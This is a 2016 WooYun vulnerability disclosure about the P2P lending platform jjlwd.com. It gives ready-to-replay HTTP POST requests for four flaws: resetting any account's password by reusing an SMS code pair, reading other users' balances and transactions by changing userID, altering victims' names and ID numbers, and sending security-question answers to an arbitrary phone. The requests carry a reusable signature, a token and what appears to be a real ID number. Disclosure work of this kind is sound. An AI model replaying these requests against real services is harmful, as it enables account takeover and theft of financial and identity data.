P2P金融安全之京金联某处密码重置等多个设计缺陷

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0187123

漏洞标题：P2P金融安全之京金联某处密码重置等多个设计缺陷

漏洞作者：路人甲

提交时间：2016-03-20 23:22

修复时间：2016-03-25 23:30

公开时间：2016-03-25 23:30

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-03-20：细节已通知厂商并且等待厂商处理中
2016-03-25：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

打包了

详细说明：

http://android.myapp.com/myapp/detail.htm?apkName=com.jjl
更新时间：2016.3.17 版本1.0.2
下载安装APP
1.密码重置
先利用注册功能，给自己手机发送验证码

记下接口返回体内容，跟手机验证码
例如

randomCode：kGAMCEZ0UFw= 对应验证码：784204
重置13333333333，发送验证码并输入信息后提交，获得一个接口

利用以上俩个信息，拼接该接口

POST http://www.jjlwd.com/mobile/appService.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 155
Host: www.jjlwd.com
Connection: Keep-Alive
Accept-Encoding: gzip
Cookie: aliyungf_tc=AQAAAFLlt1sUHwgAzuXkesMh7BsNROmw
User-Agent: okhttp/2.1.0
sign=E2BFDCBE3EC3B2E291576EF46BFD9D29&verification_code=我们的验证码&functionType=4&phone_key=l1I%2FC01zZlj6GOhTk5KWcQ%3D%3D&auth=jjlwd&info=2015&sms_key=我们的randomCode&new_passwd=123123&mobile=13333333333

提交结果

修改成功

POST http://www.jjlwd.com/mobile/appService.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 199
Host: www.jjlwd.com
Connection: Keep-Alive
Accept-Encoding: gzip
Cookie: aliyungf_tc=AQAAALMzDlBkpQsAlA+I3VOca5JqHm2N
User-Agent: okhttp/2.1.0
sign=E2BFDCBE3EC3B2E291576EF46BFD9D29&verification_code=784204&functionType=4&phone_key=l1I%2FC01zZlj6GOhTk5KWcQ%3D%3D&auth=jjlwd&info=2015&sms_key=kGAMCEZ0UFw%3D&new_passwd=123123&mobile=13333333333

可保存该接口，以便下次利用，就无需发送验证码（ps：审核可直接复制该接口内容进行密码重置）
2.信息泄露
登陆（token是没有用地，会话是没有地，uid是数字地，越权走一波）
查询账号资金信息接口，可越权查看账户资金（可发现土豪账户）

POST http://www.jjlwd.com/mobile/appService.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 118
Host: www.jjlwd.com
Connection: Keep-Alive
Accept-Encoding: gzip
Cookie: aliyungf_tc=AQAAALMzDlBkpQsAlA+I3VOca5JqHm2N
User-Agent: okhttp/2.1.0
userID=11888&functionType=40&auth=jjlwd&info=2015&sign=E2BFDCBE3EC3B2E291576EF46BFD9D29&token=ECB1F97F4D805FE25e67ff2d

查询历史收益接口，可越权

POST http://www.jjlwd.com/mobile/appService.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 145
Host: www.jjlwd.com
Connection: Keep-Alive
Accept-Encoding: gzip
Cookie: aliyungf_tc=AQAAALMzDlBkpQsAlA+I3VOca5JqHm2N
User-Agent: okhttp/2.1.0
userID=11888&functionType=10&auth=jjlwd&info=2015&sign=E2BFDCBE3EC3B2E291576EF46BFD9D29&token=ECB1F97F4D805FE25e67ff2d&page_count=10&page_index=1

查询收支明细记录，可越权

POST http://www.jjlwd.com/mobile/appService.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 213
Host: www.jjlwd.com
Connection: Keep-Alive
Accept-Encoding: gzip
Cookie: aliyungf_tc=AQAAALMzDlBkpQsAlA+I3VOca5JqHm2N
User-Agent: okhttp/2.1.0
functionType=41&userID=11888&token=ECB1F97F4D805FE25e67ff2d&page_index=1&page_count=1000&startTime=2016-03-01+00%3A00%3A00&endTime=2016-03-31+23%3A59%3A59&auth=jjlwd&info=2015&sign=E2BFDCBE3EC3B2E291576EF46BFD9D29

3.个人资料修改
APP还有个功能
个人资料表更

未验证之前的姓名和身份证，仅通过验证码正确与否来确定是否修改个人资料，然后通过跟重置密码一样的手段，可直接绕过验证码，更换个人资料.
例如
修改的接口

POST http://www.jjlwd.com/mobile/appService.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 262
Host: www.jjlwd.com
Connection: Keep-Alive
Accept-Encoding: gzip
Cookie: aliyungf_tc=AQAAACQyGS1J7AwAlQ+I3bDjJoCyaq8V
User-Agent: okhttp/2.1.0
sms_key=kGAMCEZ0UFw%3D&verification_code=784204&realName=%E4%BB%80%E4%B9%88%E9%AC%BC&userID=11888&functionType=13&key=l1I%2FC01zZlj6GOhTk5KWcQ%3D%3D&auth=jjlwd&idNo=513228198401237858&info=2015&sign=E2BFDCBE3EC3B2E291576EF46BFD9D29&token=ECB1F97F4D805FE25e67ff2d

同样换掉验证码跟randCOde即可

在登陆时，服务器会返回用户的身份证号跟姓名
修改前：

修改后：

还有个重磅消息，这接口同样是有个uid的，同样存在越权操作，so，如果一放进burp跑一波，炸了（不敢试）
4.官网获取密保答案，可修改密保答案
再说个官网的缺陷
官网登陆

忘记密保问题的答案这一功能，可将答案发送给任意手机号

点击【忘记密保？发送到手机】后抓包，修改手机号

查看自己的手机短信，

输入问题答案即可，通过密保问题。

漏洞证明：

如上

修复方案：

加强验证，修复越权。
验证码不返回。
验证码跟手机号绑定。
账户跟手机号绑定。
必须给个20R对不

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-03-25 23:30

厂商回复：

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0187123

漏洞标题：P2P金融安全之京金联某处密码重置等多个设计缺陷

相关厂商：jjlwd.com

漏洞作者：路人甲

提交时间：2016-03-20 23:22

修复时间：2016-03-25 23:30

公开时间：2016-03-25 23:30

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0187123

漏洞标题：P2P金融安全之京金联某处密码重置等多个设计缺陷

相关厂商：jjlwd.com

漏洞作者： 路人甲

提交时间：2016-03-20 23:22

修复时间：2016-03-25 23:30

公开时间：2016-03-25 23:30

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0187123"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云